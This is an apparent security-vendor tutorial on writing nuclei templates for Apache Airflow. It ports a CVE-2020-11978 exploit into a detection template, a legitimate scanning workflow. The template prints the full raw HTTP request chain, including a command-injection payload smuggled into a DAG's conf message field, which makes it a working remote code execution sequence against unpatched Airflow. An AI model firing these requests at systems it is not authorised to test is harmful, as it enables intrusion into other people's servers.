Writing security templates for Apache Airflow

Apache Airflow is an open-source tool that allows users to "programmatically author, schedule and monitor workflows". We decided to create a suite of checks for testing the security of Airflow installations and to document the entire process, to show how easy it is to write custom nuclei templates for any piece of technology.

Environment Setup

Before we start creating templates, we need an Airflow instance to test against. We found this repo on GitHub with a docker-compose file that sets up a local Airflow instance. By default, the instance created by this docker-compose file isn't configured with a password.

```bash
wget https://raw.githubusercontent.com/pberba/CVE-2020-11978/main/docker-compose.yml
docker-compose up
```

We now have a docker-compose based Apache Airflow instance running at http://127.0.0.1:8080. Starting from this tweet, we found this GitHub project by @pberba with a Python exploit for CVE-2020-11978.

What next? We wanted to quickly port this Python exploit into a nuclei template. To create a nuclei template, all we need are the HTTP requests that reproduce the bug. The easiest way to capture all the HTTP requests originating from the Python exploit script is to use the HTTP_PROXY environment variable to proxy them.

```bash
HTTP_PROXY=http://127.0.0.1:8888 python CVE-2020-11978.py http://127.0.0.1:8080
```

This runs the Python exploit and sends every HTTP request the script makes through our proxy running at http://127.0.0.1:8888. It could be Burp proxy, proxify, or any other proxy of your choice. Once we have the required HTTP requests, we just need to copy-paste them into the raw section of our template and configure the matchers/extractors based on the exploit and requests.
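To see why setting a single environment variable is enough, here is a minimal sketch of how Python's standard library discovers proxy settings. It assumes the exploit script uses an HTTP client that honors these variables (the `requests` library does by default); the helper name `proxies_seen_by_python` is made up for illustration.

```python
import os
import urllib.request
from unittest import mock


def proxies_seen_by_python(env):
    """Return the proxy mapping Python derives from the given environment.

    `env` is a hypothetical, isolated environment so the result does not
    depend on whatever proxy variables are set on the machine running this.
    """
    with mock.patch.dict(os.environ, env, clear=True):
        return urllib.request.getproxies_environment()


# Same variable as in the command above: only http:// URLs are proxied.
print(proxies_seen_by_python({"HTTP_PROXY": "http://127.0.0.1:8888"}))
```

Note that HTTP_PROXY only applies to plain http:// targets. For an https:// target, the corresponding variable is HTTPS_PROXY.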

Here is what the requests block of the nuclei template looks like:

```yaml
requests:
  - raw:
      - |
        GET /api/experimental/test HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*

      - |
        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*

      - |
        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Length: 85
        Content-Type: application/json

        {"conf": {"message": "\"; touch test #"}}

      - |
        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: */*
```

This template consists of 4 HTTP requests. The final request includes the dynamic value {{exec_date}}, which is the execution_date we receive in the response to the 3rd HTTP request.

We can use extractors to capture a value from the response to any HTTP request defined in the template and reuse it in later requests. For this exploit, we used a regex extractor to capture execution_date from the 3rd HTTP response and stored it in a variable named exec_date, which is then used in the last request as {{exec_date}}.

```yaml
extractors:
  - type: regex
    name: exec_date
    part: body
    group: 1
    internal: true
    regex:
      - '"execution_date":"([0-9-A-Z:+]+)"'
```

We also set internal: true because we only want to use this value internally as a variable; by default, extracted values are printed in the CLI output.
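The extract-then-reuse flow can be sketched outside nuclei to check the regex before running the template. This is a rough Python approximation, not how nuclei works internally: the response body is a made-up sample, and the helpers `extract_exec_date` and `render` are hypothetical names used only for illustration.

```python
import re

# Same pattern as the extractor in the template; group 1 holds the date.
EXEC_DATE_RE = re.compile(r'"execution_date":"([0-9-A-Z:+]+)"')


def extract_exec_date(body):
    """Return the captured execution date, or None if the body has none."""
    match = EXEC_DATE_RE.search(body)
    return match.group(1) if match else None


def render(raw_request, variables):
    """Replace {{name}} placeholders with values (simplified stand-in)."""
    for name, value in variables.items():
        raw_request = raw_request.replace("{{" + name + "}}", value)
    return raw_request


# Hypothetical body of the 3rd response; a real response may differ.
sample_body = '{"execution_date":"2021-06-01T12:00:00+00:00","message":"Created"}'

exec_date = extract_exec_date(sample_body)
request_line = render(
    "GET /api/experimental/dags/example_trigger_target_dag"
    "/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1",
    {"exec_date": exec_date},
)
print(request_line)
```

If the extractor finds nothing, `extract_exec_date` returns None here. In the template, a missing value would leave the final request without a usable date, so it is worth testing the pattern against a captured response first.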

The final and most important part of the template is the matcher. Nuclei results are only as good as the matchers, so we need a matcher that is unique to the vulnerable response to avoid false-positive results.

```yaml
req-condition: true
matchers-condition: and
matchers:
  - type: dsl
    dsl:
      - 'contains(body_4, "operator\":\"BashOperator")'
      - 'contains(all_headers_4, "application/json")'
    condition: and
```

When writing a template with multiple HTTP requests, it's better to use req-condition: true, which lets us write matchers against a specific request's response. For this exploit, if the target is vulnerable, the response to the 4th HTTP request will contain the string "operator":"BashOperator".

Here the trailing digits in body_4 and all_headers_4 indicate the request number. With that, the template to detect Apache Airflow <= 1.10.10 - Example Dag Remote Code Execution is complete.
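The matcher logic boils down to two substring checks on the 4th response, joined with AND. A minimal Python sketch of that logic follows; the function name `is_match` and both sample responses are assumptions made up for illustration, not captured Airflow output.

```python
def is_match(body_4, all_headers_4):
    """Mimic the two DSL checks: both must hold (condition: and)."""
    has_operator = 'operator":"BashOperator' in body_4
    is_json = "application/json" in all_headers_4
    return has_operator and is_json


# Hypothetical vulnerable response to the 4th request.
vulnerable = is_match(
    '{"operator":"BashOperator","state":"success"}',
    "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n",
)

# Hypothetical unrelated page that merely mentions the word.
unrelated = is_match(
    "<html>BashOperator docs</html>",
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n",
)
print(vulnerable, unrelated)
```

Requiring both the JSON key/value pair and the JSON content type is what keeps an HTML page that happens to contain "BashOperator" from being reported.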

Similarly, we prepared an Apache Airflow detection template and a workflow that runs multiple templates to assess the security of Airflow instances.

The workflow runs the Airflow detection template first and, if Airflow is detected, runs all the related templates as defined below:

```yaml
workflows:

  - template: technologies/airflow-detect.yaml
    subtemplates:
      - template: cves/2020/CVE-2020-11978.yaml
      - template: cves/2020/CVE-2020-13927.yaml
      - template: exposed-panels/airflow-panel.yaml
      - template: exposures/configs/airflow-configuration-exposure.yaml
      - template: default-logins/apache/airflow-default-credentials.yaml
      - template: misconfiguration/airflow/
```

```bash
nuclei -w workflows/airflow-workflow.yaml -list airflow_urls.txt
```
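The gating behaviour of the workflow (subtemplates run only when detection matches) can be pictured with a small Python sketch. It models the control flow only and says nothing about nuclei's internals; `run_workflow`, the stub checks, and the target URLs are all hypothetical.

```python
from typing import Callable, Dict, List

Check = Callable[[str], bool]


def run_workflow(target: str, detect: Check, subtemplates: Dict[str, Check]) -> List[str]:
    """Return names of subtemplates that matched, or [] if detection fails."""
    if not detect(target):
        # Not Airflow: skip every subtemplate for this target.
        return []
    return [name for name, check in subtemplates.items() if check(target)]


# Stub checks standing in for real templates (illustrative only).
def detect_airflow(url: str) -> bool:
    return "airflow" in url


subtemplates = {
    "CVE-2020-11978": lambda url: True,
    "airflow-default-credentials": lambda url: False,
}

print(run_workflow("http://airflow.example.test:8080", detect_airflow, subtemplates))
print(run_workflow("http://other.example.test", detect_airflow, subtemplates))
```

Gating on detection means hosts that are not running Airflow never receive the Airflow-specific requests, which keeps large scans faster and quieter.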

Similarly, you can prepare sets of templates for any technology with known issues and easily automate the security workflow in your organization. You can craft a template for the bug class you find most often so that you don't have to repeat the manual steps for every host you test. Write the template once and use it forever 😉

If you have created checks for Airflow or similar solutions and want to contribute them to the growing community of public templates, do consider making a PR or opening an issue in the nuclei-templates repository.